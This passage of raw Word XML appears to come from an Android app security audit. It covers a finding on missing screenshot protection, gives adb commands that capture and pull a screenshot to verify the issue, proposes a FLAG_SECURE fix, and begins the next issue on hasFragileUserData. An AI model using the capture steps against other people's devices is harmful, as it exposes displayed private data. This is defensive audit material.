        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>protection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The Android app allows applications to capture what is being displayed on the screen. Malicious apps without any special permissions may accomplish this by simply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>prompting the user for screen capture access, which is common in Android for screenshot and video recording apps. Malicious apps with root privileges can achieve this without any user warnings or prompts. Please note malicious apps could gain root privileges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>simply prompting the user for them or a rooted phone or exploiting a number</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="129"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487629824">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>243653</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="109" name="Graphic 109"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="109" name="Graphic 109"/>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9.185278pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15686656;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape82" coordorigin="1440,384" coordsize="2880,0" path="m1440,384l4320,384e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>173</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId260">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>http://developer.android.com/reference/[...]/View.html#setFilterTouchesWhenObscured(boolean)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>174</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId261">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>http://developer.android.com/reference/[...]/View.html#attr_android:filterTouchesWhenObscured</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>175</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId262">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.android.com/reference/android/view/View#security</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spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="366" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of publicly known Android vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>176</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> on unpatched devices (common). In the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>paper </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Security Metrics for the Android Ecosystem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>177</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> researchers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>from the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>University of Cambridge </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>showed that root privileges can in fact be gained on 87.7% of Android phones through a security vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="370"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>verified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>physical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>device</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>emulator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>commands, which using a non-root adb session will capture what is displayed on the screen while the Android app is open, and then download it to the computer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="4309" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>adb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>screencap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/sdcard/screenshot1.png adb pull /sdcard/screenshot1.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ensure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Webviews</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>FLAG_SECURE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>178</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> set. This will guarantee that even apps running with root privileges cannot directly capture the information displayed by the app. This is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>best</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>accomplished</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>centralized security control, such as the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>onCreate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>event of a base activity that all other activities </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>inherit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Proposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Fix:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>public class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>BaseActivity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>extends </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Activity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@Override</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1511" w:right="2112" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>onCreate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(Bundle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>savedInstanceState)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.onCreate(savedInstanceState);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="1538" w:right="2112" w:hanging="28"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>getWindow().setFlags(LayoutParams.FLAG_SECURE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>LayoutParams.FLAG_SECURE);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1016" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Undefined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>android:hasFragileUserData</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Since Android 10, it is possible to specify whether application data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>survive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>when apps are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>uninstalled</w:t>
      </w:r>
